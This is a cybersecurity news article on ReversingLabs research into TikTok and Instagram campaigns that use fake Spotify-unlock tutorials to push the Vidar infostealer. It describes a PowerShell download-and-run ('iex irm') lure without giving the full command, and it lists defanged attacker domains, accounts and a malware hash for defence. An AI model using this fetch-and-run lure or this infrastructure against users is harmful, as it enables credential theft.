Hackers Abuse TikTok and Instagram Reels to Spread Malware via Fake Free Software Tutorials
Cybercriminals are now turning to short-form video platforms as a new attack surface, using fake software tutorials on TikTok and Instagram Reels to push malware onto unsuspecting users.
The tactic is simple but remarkably effective: create polished, convincing videos that promise free access to popular premium software, then quietly funnel viewers toward malicious downloads.
The attack works because it blends in so naturally. These videos look no different from the millions of tech tips and how-to clips that flood social media every single day.
With thousands of views and hundreds of likes behind them, victims have little reason to question whether the content is genuine. That false sense of credibility is exactly what the attackers count on.
Analysts at ReversingLabs identified and analyzed two distinct campaign methods used in this threat, both managing to reach massive audiences by gaming social media recommendation algorithms.
The research was led by threat intelligence researcher Zaria Vuksan, who documented how attackers expertly exploit platform engagement mechanics to spread malware at scale across multiple platforms.
Both campaigns share the same end goal: send users to a third-party website hosting malicious software disguised as a free premium app. What differs is how each campaign builds trust before delivering the payload.
The malware deployed through these videos is Vidarstealer, a well-known infostealer offered as a service that steals login credentials, financial data, and session tokens from infected devices.
Vidarstealer received an update in October of last year, making it more evasive and harder to detect. With a lifetime license priced at around $300, it remains a favorite tool for threat actors across many campaigns.
ReversingLabs said in a report shared with Cyber Security News (CSN) that this combination of widespread social media reach and accessible malware tools creates a genuinely dangerous threat environment for everyday users and organizations alike.
Hackers Abuse TikTok and Instagram Reels
The first campaign uses accounts with usernames like “windows.tips” or “windows.insights,” paired with a blue and white profile image designed to closely mimic the official Windows social media icon.
These accounts post professional tutorial videos with AI-generated voice overs, walking users through typing a specific PowerShell command that supposedly unlocks Spotify Premium for free.
That command instructs Windows to silently download and run a script from a remote address. When users follow the steps without question, they unknowingly execute a file identified as Vidarstealer.
What makes this especially dangerous is how clean and authoritative the videos appear, with many racking up over 100,000 views alongside thousands of saves and shares.
The second campaign takes a far more casual approach to luring victims. These accounts post short, vague clips showing premium Spotify features while playing trending music, then encourage viewers to comment out of curiosity.
Once engagement builds, the attacker replies with directions to malicious sites like pluginchad[.]xyz or d4ug[.]site, which offer fake software downloads hidden behind survey walls.
Why These Social Engineering Attacks Are Difficult to Stop
What makes this threat especially stubborn is that social media platforms are not well equipped to stop it. Researchers at ReversingLabs attempted to report malicious Instagram accounts as scams, and every single report was rejected.
Even when content is flagged, platforms act slowly, and by the time an account is removed, the damage is already done.
Attackers also suppress community warnings with considerable ease. If a viewer leaves a comment alerting others to the scam, the attacker simply deletes it and blocks that user right away.
This dynamic makes genuine self-policing nearly impossible, leaving the full burden of defense squarely on organizations and individual users to handle.
Practical defenses do exist and should be acted on now. Organizations should regularly audit who holds installation permissions on work devices, since some software promoted in these videos is framed as useful professional tools.
Phishing training programs must stay current and explicitly cover social media as an attack vector, not just email. Users should report suspicious accounts consistently, since higher report volumes do increase the likelihood of removal and can slow an attacker’s momentum.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| Hash | 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153 | SHA-256 hash of build.exe, identified as Vidarstealer |
| Domain | pluginchad[.]xyz | Malicious site hosting fake free software downloads |
| Domain | maxapk[.]xyz | Malicious site hosting fake free software downloads |
| Domain | d4ug[.]site | Fake site claiming to “Unlock premium games and AI tools” |
| Domain | slmgr[.]sh | Domain used in malicious PowerShell command delivery |
| Domain | msget[.]run | Domain used to deliver Vidarstealer via iex irm command |
| Account | tiktok[.]com/@windows.tips1 | Malicious TikTok account used in tutorial campaign |
| Account | tiktok[.]com/@windows.insight | Malicious TikTok account used in tutorial campaign |
| Account | tiktok[.]com/@davidcooksey47 | Malicious TikTok account associated with campaign |
| Account | tiktok[.]com/@tracyhughe | Malicious TikTok account associated with campaign |
| Account | tiktok[.]com/@mr.capcut.pro2 | Malicious TikTok account associated with campaign |
| Account | instagram[.]com/wtips404 | Malicious Instagram account used in campaign |
| Account | instagram[.]com/wndwstips | Malicious Instagram account used in campaign |
| Account | instagram[.]com/epemberton369 | Malicious Instagram account used in campaign |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Hackers Abuse TikTok and Instagram Reels to Spread Malware via Fake Free Software Tutorials appeared first on Cyber Security News.
Tushar Subhra Dutta
Go to cyber-security-news